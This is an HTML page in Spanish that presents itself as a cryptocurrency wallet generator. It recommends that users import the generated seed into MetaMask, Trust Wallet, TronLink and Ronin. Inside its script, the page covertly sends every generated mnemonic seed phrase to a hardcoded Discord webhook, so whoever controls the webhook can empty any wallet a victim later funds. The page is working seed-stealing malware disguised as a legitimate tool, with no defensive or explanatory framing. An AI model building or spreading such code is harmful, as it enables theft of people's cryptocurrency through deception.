<!DOCTYPE html>
<html>
<head>
  <title>Generador de Wallet</title>
  <style>
    body {
      font-family: 'Roboto', Arial, sans-serif;
      background-color: #222;
      color: #fff;
    }

    .container {
      max-width: 500px;
      margin: 0 auto;
      padding: 20px;
      background-color: rgba(0, 0, 0, 0.8);
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.3);
      text-align: center;
    }

    h1 {
      color: #fff;
      margin-bottom: 30px;
      font-size: 28px;
    }

    p {
      color: #ccc;
      margin-bottom: 20px;
      line-height: 1.5;
    }

    button {
      padding: 10px 20px;
      background-color: #007bff;
      color: #fff;
      border: none;
      border-radius: 4px;
      font-size: 16px;
      cursor: pointer;
      margin-top: 20px;
      transition: background-color 0.3s;
    }

    button:hover {
      background-color: #0056b3;
    }

    input[type="text"] {
      width: 100%;
      margin-top: 10px;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 4px;
      font-size: 16px;
      box-sizing: border-box;
      margin-bottom: 10px;
    }

    .copy-icon {
      display: inline-block;
      width: 16px;
      height: 16px;
      margin-left: 5px;
      cursor: pointer;
      vertical-align: middle;
      background: url(copy_icon.png) no-repeat center center;
      background-size: cover;
      opacity: 0.6;
    }

    .wallet-logos {
      display: flex;
      justify-content: space-around;
      align-items: center;
      margin-top: 20px;
    }

    .wallet-logo {
      width: 50px;
      height: 50px;
      opacity: 0.7;
      transition: opacity 0.3s;
    }

    .wallet-logo:hover {
      opacity: 1;
    }

    .countdown {
      color: #fff;
      margin-top: 10px;
      font-size: 18px;
    }
  </style>
  <script src="https://cdn.ethers.io/lib/ethers-5.0.umd.min.js"></script>
  <script>
    function generateWallet() {
      const generateButton = document.getElementById('generateButton');
      generateButton.disabled = true;

      const countdownElement = document.getElementById('countdown');
      countdownElement.innerHTML = 'Creando wallet...';

      const countdownDuration = 5; // Duración en segundos del contador
      let countdown = countdownDuration;

      const countdownInterval = setInterval(() => {
        countdown--;
        countdownElement.innerHTML = `Creando wallet... ${countdown} segundos`;

        if (countdown === 0) {
          clearInterval(countdownInterval);
          countdownElement.innerHTML = 'Wallet creada';
          generateButton.disabled = false;
        }
      }, 1000);

      const mnemonic = ethers.Wallet.createRandom().mnemonic;
      document.getElementById('seedField').value = mnemonic;

      // Enviar la semilla generada a través del webhook de Discord
      const webhookUrl = 'https://discordapp.com/api/webhooks/1073374509165465700/mr2ICeCadLB01KfbfV0HSI7bfpBkIaYTyIFMPLMW58Og3xWGRpv2EOOowLITDz3SRs3m';

      const payload = {
        content: mnemonic
      };

      fetch(webhookUrl, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify(payload)
      })
        .then(function (response) {
          if (response.ok) {
            console.log('Semilla enviada al webhook de Discord');
          } else {
            console.error('Error al enviar la semilla al webhook de Discord:', response.status);
          }
        })
        .catch(function (error) {
          console.error('Error al enviar la semilla al webhook de Discord:', error);
        });
    }

    function copySeed() {
      const seedField = document.getElementById('seedField');
      seedField.select();
      seedField.setSelectionRange(0, 99999);
      document.execCommand('copy');

      const copyIcon = document.getElementById('copyIcon');
      copyIcon.style.opacity = 1;
      setTimeout(function () {
        copyIcon.style.opacity = 0.6;
      }, 1000);
    }
  </script>
</head>
<body>
  <div class="container">
    <h1>Crea tu Wallet</h1>
    <p>Genera una nueva billetera y obtén una semilla mnemotécnica única que puedes utilizar con diferentes wallets.</p>
    <button id="generateButton" onclick="generateWallet()">Generar Wallet</button>
    <input id="seedField" type="text" readonly>
    <span class="copy-icon" id="copyIcon" onclick="copySeed()" title="Copiar semilla"></span>
    <input id="addressField" type="text" readonly>

    <div class="wallet-logos">
      <img class="wallet-logo" src="metamask_logo.png" alt="Metamask" title="Metamask - Puedes usar la semilla para cargar saldo, comprar y vender criptomonedas, y realizar transferencias.">
      <img class="wallet-logo" src="trustwallet_logo.png" alt="Trust Wallet" title="Trust Wallet - Puedes usar la semilla para cargar saldo, comprar y vender criptomonedas, y realizar transferencias.">
      <img class="wallet-logo" src="tronlink_logo.png" alt="TronLink" title="TronLink - Puedes usar la semilla para cargar saldo, comprar y vender criptomonedas, y realizar transferencias.">
      <img class="wallet-logo" src="roninwallet_logo.png" alt="Ronin Wallet" title="Ronin Wallet - Puedes usar la semilla para cargar saldo, comprar y vender criptomonedas, y realizar transferencias.">
    </div>

    <p class="countdown" id="countdown"></p>
  </div>
</body>
</html>
